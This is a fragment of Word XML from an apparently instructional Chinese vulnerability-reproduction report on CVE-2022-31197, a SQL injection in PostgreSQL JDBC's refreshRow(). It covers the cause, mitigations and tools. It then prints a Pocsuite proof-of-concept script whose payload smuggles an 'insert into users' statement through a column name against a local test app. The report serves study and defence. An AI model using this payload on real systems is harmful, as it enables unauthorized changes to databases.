                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1651" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:hint="default" w:eastAsia="宋体"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:t>8-高危</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5721" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:hint="default" w:eastAsia="宋体"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:eastAsia="Helvetica" w:cs="Helvetica"/>
                <w:i w:val="0"/>
                <w:iCs w:val="0"/>
                <w:caps w:val="0"/>
                <w:color w:val="333333"/>
                <w:spacing w:val="0"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:shd w:val="clear" w:fill="FFFFFF"/>
              </w:rPr>
              <w:t>该攻击要求攻击者诱骗用户针对列名包含恶意 SQL 的表名执行 SQL，然后调用 ResultSet 上的“refreshRow()”方法。应用程序的 JDBC 用户和</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/>
                <w:i w:val="0"/>
                <w:iCs w:val="0"/>
                <w:caps w:val="0"/>
                <w:color w:val="333333"/>
                <w:spacing w:val="0"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:shd w:val="clear" w:fill="FFFFFF"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:t>数据库</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:eastAsia="Helvetica" w:cs="Helvetica"/>
                <w:i w:val="0"/>
                <w:iCs w:val="0"/>
                <w:caps w:val="0"/>
                <w:color w:val="333333"/>
                <w:spacing w:val="0"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:shd w:val="clear" w:fill="FFFFFF"/>
              </w:rPr>
              <w:t>所有者不必相同。</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="default" w:ascii="Helvetica" w:hAnsi="Helvetica" w:eastAsia="Helvetica" w:cs="Helvetica"/>
                <w:i w:val="0"/>
                <w:iCs w:val="0"/>
                <w:caps w:val="0"/>
                <w:color w:val="333333"/>
                <w:spacing w:val="0"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:shd w:val="clear" w:fill="FFFFFF"/>
              </w:rPr>
              <w:t>以特权用户身份执行并查询潜在恶意的低特权用户所拥有的数据库将很容易受到攻击。</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:bidi w:val="0"/>
      </w:pPr>
    </w:p>
    <w:p/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:spacing w:before="312" w:after="312"/>
      </w:pPr>
      <w:bookmarkStart w:id="22" w:name="_Toc6854"/>
      <w:bookmarkStart w:id="23" w:name="_Toc28758"/>
      <w:bookmarkStart w:id="24" w:name="_Toc6133"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>3.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>漏洞复现</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>过程</w:t>
      </w:r>
      <w:bookmarkEnd w:id="22"/>
      <w:bookmarkEnd w:id="23"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>（</w:t>
      </w:r>
      <w:r>
        <w:t>3</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>5分）</w:t>
      </w:r>
      <w:bookmarkEnd w:id="24"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:spacing w:before="156" w:after="156"/>
      </w:pPr>
      <w:bookmarkStart w:id="25" w:name="_Toc18532"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>3.1 风险管理及规避</w:t>
      </w:r>
      <w:bookmarkEnd w:id="25"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:fill="FFFFFF"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>该漏洞的产生，终究是因为在</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>ResultSet</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:fill="FFFFFF"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>refreshRow()</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:fill="FFFFFF"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>函数内部，将一个完整sql语法中的select column from table和where及之后的主键简单拼接，由于column、table和主键均来自于数据库底层的全局变量，若该变量可控，即可使用’;’结合拼接操作完成payload注入。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:firstLine="420" w:firstLineChars="0"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="0"/>
          <w:kern w:val="2"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:fill="FFFFFF"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar-SA"/>
        </w:rPr>
        <w:t>因此，可以对数据库的列名初始化时便进行充分的过滤；或者避免对sql语句的简单拼接，而是经过仔细的审查。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:spacing w:before="156" w:after="156"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="26" w:name="_Toc10352"/>
      <w:bookmarkStart w:id="27" w:name="_Toc4033"/>
      <w:bookmarkStart w:id="28" w:name="_Toc23034"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>3.</w:t>
      </w:r>
      <w:r>
        <w:t>2</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>测试方法</w:t>
      </w:r>
      <w:bookmarkEnd w:id="26"/>
      <w:bookmarkEnd w:id="27"/>
      <w:bookmarkEnd w:id="28"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:firstLine="420" w:firstLineChars="0"/>
        <w:rPr>
          <w:rFonts w:hint="default" w:eastAsia="宋体"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>本地搭建适配漏洞的web环境，并使用python编写自动化脚本进行检测。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:spacing w:before="156" w:after="156"/>
      </w:pPr>
      <w:bookmarkStart w:id="29" w:name="_Toc28030"/>
      <w:bookmarkStart w:id="30" w:name="_Toc28445"/>
      <w:bookmarkStart w:id="31" w:name="_Toc75461104"/>
      <w:bookmarkStart w:id="32" w:name="_Toc10303"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>3.</w:t>
      </w:r>
      <w:r>
        <w:t>3</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>测试中所用的工具</w:t>
      </w:r>
      <w:bookmarkEnd w:id="29"/>
      <w:bookmarkEnd w:id="30"/>
      <w:bookmarkEnd w:id="31"/>
      <w:bookmarkEnd w:id="32"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="00B0F0"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>Java 8；eclipse；postgreSQL 42.2.25；python2.7；navicat</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>；</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:cs="宋体"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:cs="宋体"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default" w:cs="宋体"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="312" w:after="312"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="33" w:name="_Toc11461"/>
      <w:bookmarkStart w:id="34" w:name="_Toc19260"/>
      <w:bookmarkStart w:id="35" w:name="_Toc75461114"/>
      <w:bookmarkStart w:id="36" w:name="_Toc12892"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>漏洞复现</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>结果</w:t>
      </w:r>
      <w:bookmarkEnd w:id="33"/>
      <w:bookmarkEnd w:id="34"/>
      <w:bookmarkEnd w:id="35"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>（25分）</w:t>
      </w:r>
      <w:bookmarkEnd w:id="36"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="156" w:after="156"/>
        <w:ind w:left="0" w:leftChars="0" w:firstLine="0" w:firstLineChars="0"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="37" w:name="_Toc32666"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>POC插件编写</w:t>
      </w:r>
      <w:bookmarkEnd w:id="37"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:ind w:leftChars="0"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pP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#!/usr/bin/env python</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 -*- coding: utf-8 -*-</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from pocsuite.api.request import req</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from pocsuite.api.poc import register,Output, POCBase</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from pocsuite.thirdparty.guanxing import parse_ip_port, http_packet, make_verify_url</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class TestPOC(POCBase):</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vulID = ''''''</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cveID = 'CVE-2022-31197'</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cnvdID = ''''''</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cnnvdID = ''''''</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version = ''''''</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author = 'Li JiaHao'</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vulDate = '2022/8/23 17:47:51'</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createDate = '2023-07-19'</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updateDate = '2023-07-19'</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name = ''''''</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desc = ''''''</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solution = ''''''</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severity = ''''''</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vulType = ''''''</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taskType = ''''''</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references = ['https://github.com/pgjdbc/pgjdbc/security/advisories/GHSA-r38f-c4h4-hqq2','http://www.hackdig.com/08/hack-762021.htm']</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appName = 'PostgreSQL JDBC SQL注入漏洞'</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appVersion = ''''''</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appPowerLink = ''''''</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samples = ['']</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install_requires = ['''''']</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def _verify(self):</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self.url,ip,port = parse_ip_port(self.target, 80)</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result = {}</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headers = {</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'Content-Type':'application/x-www-form-urlencoded; charset=UTF-8'</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path = "/CVE/test.jsp?table=annormal2" #漏洞的路径</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base_url = "/CVE/"</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my_row = (6,'fond')</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def create_annormal_table():</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payload = 'table_name=annormal2&amp;columns=id-%221;insert%20into%20users%20values(6,%27fond%27,%27555%27);select%20*%22&amp;types=int,int'</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url = self.url+base_url + 'create.jsp?' + payload</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r = req.get(url, timeout=10)</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return r</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def insert_data(n):</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payload = 'table_name=annormal2&amp;val=' + str(n) + ',' + str(n)</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url = self.url+base_url + 'insert.jsp?' + payload</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r=req.get(url, headers=headers, verify=False, allow_redirects=False, timeout=10)</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return r</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create_annormal_table()</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for i in range(2):</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insert_data(i)</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vul_url = self.url + path</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resp = req.post(vul_url, headers=headers, verify=False, allow_redirects=False, timeout=10)</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if resp.status_code == 200 and "Key (id)=(6) already exists." in resp.text:</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result['VerifyInfo'] = http_packet(resp)</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result['VerifyInfo']['URL'] = vul_url</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result['VerifyInfo']['port'] = port</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return self.parse_output(result)</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 vul_url = make_verify_url(self.url, path, mod=0) #生成完整路径</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 data = '' #漏洞的data数据</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 resp = req.post(vul_url, headers = headers, data = data, verify = False, allow_redirects = False, timeout = 10)</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 if resp.status_code == 200 and '' in resp.content: #判断条件</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 xml:space="preserve"># </w:t>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result['VerifyInfo'] = http_packet(resp)</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 xml:space="preserve"># </w:t>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result['VerifyInfo']['URL'] = vul_url</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 xml:space="preserve"># </w:t>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result['VerifyInfo']['port'] = port</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 return self.parse_output(result)</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def _attack(self):</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return self._verify()</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def parse_output(self, result):</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output = Output(self)</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if result:</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output.success(result)</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else:</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output.fail('Failed')</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ab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:asciiTheme="minorAscii" w:hAnsiTheme="minorAscii"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>return output</w:t>
      </w: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b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:keepNext/>
        <w:keepLines/>
        <w:pageBreakBefore w:val="0"/>
        <w:widowControl w:val="0"/>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50" w:beforeLines="50" w:after="50" w:afterLines="50" w:line="300" w:lineRule="exact"/>
        <w:jc w:val="both"/>
        <w:textAlignment w:val="auto"/>
        <w:outlineLvl w:val="1"/>
        <w:rPr>
          <w:rFonts w:hint="default" w:asciiTheme="minorAscii" w:hAnsiTheme="minorAscii"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:asciiTheme="minorAscii" w:hAnsiTheme="minorAscii"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>register(TestPOC)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:spacing w:before="156" w:after="156"/>
      </w:pPr>
      <w:bookmarkStart w:id="38" w:name="_Toc25120"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>4.2 漏洞信息</w:t>
      </w:r>
      <w:bookmarkEnd w:id="38"/>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="14"/>
        <w:tblW w:w="9229" w:type="dxa"/>
        <w:jc w:val="center"/>
        <w:tblLayout w:type="fixed"/>
        <w:tblCellMar>
          <w:top w:w="0" w:type="dxa"/>
          <w:left w:w="108" w:type="dxa"/>
          <w:bottom w:w="0" w:type="dxa"/>
          <w:right w:w="108" w:type="dxa"/>
        </w:tblCellMar>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="1417"/>
        <w:gridCol w:w="1559"/>
        <w:gridCol w:w="1644"/>
        <w:gridCol w:w="1300"/>
        <w:gridCol w:w="1740"/>
        <w:gridCol w:w="1569"/>
      </w:tblGrid>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pStyle w:val="18"/>
              <w:spacing w:line="480" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:b/>
                <w:bCs/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:b/>
                <w:bCs/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:t>UVD-ID</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1559" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="auto" w:sz="4" w:space="0"/>
              <w:left w:val="single" w:color="auto" w:sz="4" w:space="0"/>
              <w:bottom w:val="single" w:color="auto" w:sz="4" w:space="0"/>
              <w:right w:val="single" w:color="auto" w:sz="4" w:space="0"/>
            </w:tcBorders>
            <w:vAlign w:val="top"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="18"/>
              <w:spacing w:line="480" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="宋体" w:cs="Times New Roman"/>
                <w:kern w:val="21"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="21"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar-SA"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:kern w:val="21"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="21"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar-SA"/>
              </w:rPr>
              <w:t>空</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="164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漏洞类别</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1300" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="auto" w:sz="4" w:space="0"/>
              <w:left w:val="single" w:color="auto" w:sz="4" w:space="0"/>
              <w:bottom w:val="single" w:color="auto" w:sz="4" w:space="0"/>
              <w:right w:val="single" w:color="auto" w:sz="4" w:space="0"/>
            </w:tcBorders>
            <w:vAlign w:val="top"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="18"/>
              <w:spacing w:line="480" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="宋体" w:cs="Times New Roman"/>
                <w:kern w:val="21"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="21"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar-SA"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:cs="宋体" w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia"/>
                <w:color w:val="000000"/>
                <w:kern w:val="0"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
              </w:rPr>
              <w:t>SQL注入</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="174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spacing w:line="480" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:hint="default"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CVE-ID</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1569"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Calibri" w:hAnsi="Calibri" w:eastAsia="宋体" w:cs="Calibri"/>
                <w:i w:val="0"/>
                <w:iCs w:val="0"/>
                <w:color w:val="000000"/>
                <w:kern w:val="2"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
                <w:u w:val="none"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar-SA"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="default" w:cs="宋体" w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia"/>
                <w:color w:val="000000"/>
                <w:kern w:val="0"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
              </w:rPr>
              <w:t>CVE-2022-31197</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>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pStyle w:val="18"/>
              <w:spacing w:line="480" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:b/>
                <w:bCs/>
                <w:lang w:eastAsia="zh-CN"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>披露/发现时间</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1559" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="auto" w:sz="4" w:space="0"/>
              <w:left w:val="single" w:color="auto" w:sz="4" w:space="0"/>
              <w:bottom w:val="single" w:color="auto" w:sz="4" w:space="0"/>
              <w:right w:val="single" w:color="auto" w:sz="4" w:space="0"/>
            </w:tcBorders>
            <w:vAlign w:val="top"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="18"/>
              <w:spacing w:line="480" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="宋体" w:cs="Times New Roman"/>
                <w:kern w:val="21"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="21"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar-SA"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:cs="宋体" w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia"/>
                <w:color w:val="000000"/>
                <w:kern w:val="0"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
              </w:rPr>
              <w:t>2022/8/23 17:47:51</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="164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bugtraq编号</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1300" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="auto" w:sz="4" w:space="0"/>
              <w:left w:val="single" w:color="auto" w:sz="4" w:space="0"/>
              <w:bottom w:val="single" w:color="auto" w:sz="4" w:space="0"/>
              <w:right w:val="single" w:color="auto" w:sz="4" w:space="0"/>
            </w:tcBorders>
            <w:vAlign w:val="top"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="18"/>
              <w:spacing w:line="480" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="宋体" w:cs="Times New Roman"/>
                <w:kern w:val="21"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="21"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar-SA"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:kern w:val="21"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="21"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar-SA"/>
              </w:rPr>
              <w:t>空</w:t>
